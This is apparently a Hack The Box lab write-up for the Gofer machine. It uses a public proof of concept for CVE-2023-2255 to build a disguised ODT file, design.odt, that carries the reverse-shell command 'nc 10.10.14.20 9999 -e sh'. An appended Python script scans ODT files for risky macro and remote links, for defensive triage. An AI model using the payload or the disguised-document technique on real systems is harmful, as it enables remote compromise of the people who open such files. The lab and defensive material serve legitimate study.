CVE-2023-2255
┌──(kali㉿kali)-[~/archive/htb/labs/gofer]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git ; cd CVE-2023-2255
Cloning into 'CVE-2023-2255'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 10 (delta 2), reused 5 (delta 0), pack-reused 0
receiving objects: 100% (10/10), 8.47 KiB | 8.47 MiB/s, done.
resolving deltas: 100% (2/2), done.

I will first download the exploit to Kali.
┌──(kali㉿kali)-[~/…/htb/labs/gofer/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --help
usage: CVE-2023-2255.py [-h] --cmd CMD [--output OUTPUT]

CVE-2023-2255

options:
  -h, --help       show this help message and exit
  --cmd CMD        Command to execute
  --output OUTPUT  Output filename

The usage appears to be simple.
┌──(kali㉿kali)-[~/…/htb/labs/gofer/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'nc 10.10.14.20 9999 -e sh' --output design.odt
File design.odt has been created !

I named the payload design.odt to blend in with the organization’s core service.
The output file has an embedded Netcat reverse shell.
Payload is ready for delivery.
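
A defender-side check for documents like the design.odt produced above, added here as an example and not part of the original writeup or the PoC repository: it opens an ODT as the ZIP archive it is and flags xlink:href targets that use script or remote schemes. That the command is carried in such an attribute is an assumption (the page does not show the file's contents); triage_odt, classify and build_sample are hypothetical names, and the sample document is constructed.

```python
import io
import re
import zipfile

# Link schemes that run code or reach outside the document package.
SCRIPT_SCHEMES = ("macro:", "vnd.sun.star.script:")
REMOTE_SCHEMES = ("http:", "https:", "ftp:", "file:", "smb:", "//")
# xlink:href with either quote style; group 2 is the attribute value.
HREF_RE = re.compile(r"""xlink:href\s*=\s*(["'])(.*?)\1""", re.DOTALL)


def classify(href):
    """Return 'script', 'remote' or None (relative / in-package link)."""
    value = href.strip().lower()
    if value.startswith(SCRIPT_SCHEMES):
        return "script"
    if value.startswith(REMOTE_SCHEMES):
        return "remote"
    return None


def triage_odt(data):
    """Scan each XML part of an ODT (a ZIP archive) for risky link targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as odt:
        for name in odt.namelist():
            if not name.endswith(".xml"):
                continue
            text = odt.read(name).decode("utf-8", errors="replace")
            for _quote, href in HREF_RE.findall(text):
                kind = classify(href)
                if kind:
                    findings.append((name, kind, href))
    return findings


def build_sample(href):
    """Constructed sample: minimal ODT-shaped ZIP with one link in content.xml."""
    body = '<office:document-content><draw:floating-frame xlink:href="%s"/></office:document-content>' % href
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        z.writestr("content.xml", body)
    return buf.getvalue()


if __name__ == "__main__":
    for href in ("macro:CONSTRUCTED-PLACEHOLDER", "Pictures/logo.png"):
        print(href, "->", triage_odt(build_sample(href)))
```

A "remote" finding is a prompt for review rather than a verdict, since ordinary hyperlinks also use http(s); a "script" target in a document received from outside deserves closer inspection before it is opened in an office suite.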